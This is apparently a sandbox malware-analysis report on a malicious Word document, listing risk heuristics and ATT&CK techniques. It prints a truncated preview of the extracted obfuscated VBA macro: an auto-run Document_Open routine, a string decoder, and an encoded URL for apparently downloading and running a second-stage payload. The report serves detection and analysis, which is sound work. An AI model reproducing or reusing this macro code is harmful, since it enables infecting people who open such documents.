MALICIOUS
182
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains VBA macros, specifically a Document_Open macro, which is a common technique for initial execution. The macro utilizes CreateObject and CallByName, indicating it's designed to perform actions beyond simple document manipulation. The obfuscated nature of the VBA code suggests an attempt to hide malicious activity, likely involving the download and execution of a secondary payload.
Heuristics 6
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
CallByName call high OLE_VBA_CALLBYNAMECallByName call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 14342 bytes |
SHA-256: 4abd1dd03218c8b0b86423fc477df1b549052bf0bec2d0ac84f1d163f070b84a |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function VoLcdxZvLzq(ByVal dKBQCXA As String, ByVal WysRECgPY As String) As Integer
yCWQIjeGcVY
DMhEJKjVZmfXnG = 6891
IzXQC 4165
AtzeLoUKvWwXGe 7578, "UQQ"
If uAXjw Then
zrpoOXVDkaG "Yg", True, "lfdHN"
YhDNjTcUk "uXh9A", True
DEQyzPHCgy
Else
JcAtqDHxwraeQ 1146
End If
VoLcdxZvLzq = 5291
End Function
Private Sub TeHnddzZhJZz(ByVal rrpHwB As String, ByVal yuGwtCUVja As Integer)
WxFqb "", 5222, True
ViWEMyogYKE
WDwqa 7063
End Sub
Private Function vRZvowQ() As String
If bDtcGRguH Then
ZYMRn
Else
fkmfcBPDmokdUl 2523
End If
vRZvowQ = "Z7Nca"
End Function
Private Sub Document_Open()
Dim NjbPzgKk As String
ncbVZ = 5132
STyXKDIQhbdU.uVCwCvWGpCr
End Sub
Private Function MaNcGp(ByVal JRQGsXpU As Integer, ByVal pEyecaqet As String) As Boolean
BnsRpkuWbFnS 564, 1218, "aK9Y"
AJMeb = 5855
IKZkkdNMoMZ 1901, "ftg"
wKaHTgcvL 7473
iltBFVz 238, "HGJOa", ""
MaNcGp = False
End Function
Attribute VB_Name = "STyXKDIQhbdU"
Private Sub LrNRGl()
Dim IEXcfKLkcQVoh As Integer
ohVbywbeX = 7110
fmarMnNmlC EJUjUnRHA.GYsOMm, 1503, Ubmdx
EJUjUnRHA.CkrHfrqaxSRA EJUjUnRHA.GYsOMm
End Sub
Public Sub uVCwCvWGpCr()
WOyUC = 4891
On Error GoTo BCuAnPCJPY
BoiTZIDhVULEwh.gtDPMeHdO
BoiTZIDhVULEwh.wlRyKBNqqij
LrNRGl
Exit Sub
BCuAnPCJPY:
End Sub
Private Sub fmarMnNmlC(ByVal eNMnklDjU As String, ByVal ifCEnLW As Integer, ByVal saDJpVoIMjc As String)
Dim CvxZoLsiSq As Integer
Set yjwMPB = MhIOBJOfiJs.hlWGYwKkcl("nT8", saDJpVoIMjc, "ng")
MhIOBJOfiJs.ulaxatewXTP yjwMPB, RaAgJTrVJMW.HJELJ("CSajSn'UUtU dJpo9w5nlSo5UadS gjbiSn.5a9ry5J f.i9lJpe", "gp.9SJ5Uj")
EJUjUnRHA.kauvzXYvLutyED eNMnklDjU, OxRcjS.ZteFAywbyvRS(yjwMPB, RaAgJTrVJMW.HJELJ("R7 emsp oQ3nsmemB5mod y ", "5 7Dm3.Q"))
End Sub
Public Function UrgxTrf(ByVal mRHjY As String, ByVal HfqlykSrDqBc As String) As Object
Dim MPYJeqrrxMqWm As String
Dim tFaqRJ As String
Set UrgxTrf = NxHHExRkztSJH(CreateObject(HfqlykSrDqBc), False, False)
End Function
Private Function NxHHExRkztSJH(ByVal pWveYaIRmHM As Object, ByVal hMHRvMo As Boolean, ByVal cdmdaCEUAfuJSZ As Boolean) As Object
Set NxHHExRkztSJH = pWveYaIRmHM
End Function
Private Function Ubmdx() As String
Ubmdx = RaAgJTrVJMW.HJELJ("Yh9tWtpWb:/M/9Yra9vLYirYa9jLbibt.YMcoYmW/Mc9aWLta9lLo9Lg/bbobffM9i9ceb19W1M.WdYatY", "bY9WML")
End Function
Attribute VB_Name = "RaAgJTrVJMW"
Public Function HJELJ(ByVal KKuNtvPGvfyxt As String, ByVal gmnNSHJQAflRv As String) As String
Dim rxdcRr As Boolean
For MJcOYhSUR = ZERVNzrUeTVH To kAzSjkCumyJ.XDaKOXsoNHw("KA", KKuNtvPGvfyxt)
HJELJ = kAzSjkCumyJ.CoxAyynW("T9w", HJELJ, 8054, RbMVQ(gmnNSHJQAflRv, kAzSjkCumyJ.hTblwynf(MJcOYhSUR, "utc", KKuNtvPGvfyxt)))
Next
End Function
Private Sub KTmyoPwZ(ByVal OVovRnAFqdFZjv As Boolean)
VYZBorUyzwC = ""
UuQMAdUIOCoi 4633, ""
oQFbyABW "", "ref79", "0w"
mSfHvffN = False
eiEAEjtEFh "VZA"
qWfGsHxG 7882
tQxESX = 779
ZghyiIEi
End Sub
Private Sub AhXCAMkZx()
If kHqWGUOKHJh Then
OEzGYYadhQLwV
JiXXzpuV = "5uHKs"
End If
End Sub
Private Function RbMVQ(ByVal pKxwbmnUM As String, ByVal AioZDXcuMxU As String) As String
Dim xXXmmgXO As Integer
Dim ZAgnNK As String
If Not kAzSjkCumyJ.aLaBHlk(AioZDXcuMxU, "LtG2", pKxwbmnUM, 4638) Then
RbMVQ = AioZDXcuMxU
End If
End Function
Private Function ZERVNzrUeTVH() As Integer
sAOxfkFRnFQGZ = "NJ8"
ZERVNzrUeTVH = 1
End Function
Attribute VB_Name = "MhIOBJOfiJs"
Private Function fyEhcknnjGD() As String
rDqqFQvjF
EcWNvPdUqpoZ "H0dY", "l7Ml", 1389
TlVKxIFAFjvWiQ
MuBjjhynpkYtqY 2198, 3506, 5073
EesMCJU
fyEhcknnjGD = "wI4"
End Function
Private Function RdFWM() As Integer
RdFWM = 400
End Function
Public Sub ulaxatewXTP(ByVal cNkUBLSmhcQot As Object, ByVal angEurTqDQqC As String)
OxRcjS.LjDNvbNyQq cNkUBLSmhcQot, RaAgJTrVJMW.HJELJ("iSe 7nid", "Zip3 7o")
If OxRcjS.ZteFAywbyvRS(cNkUBL
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.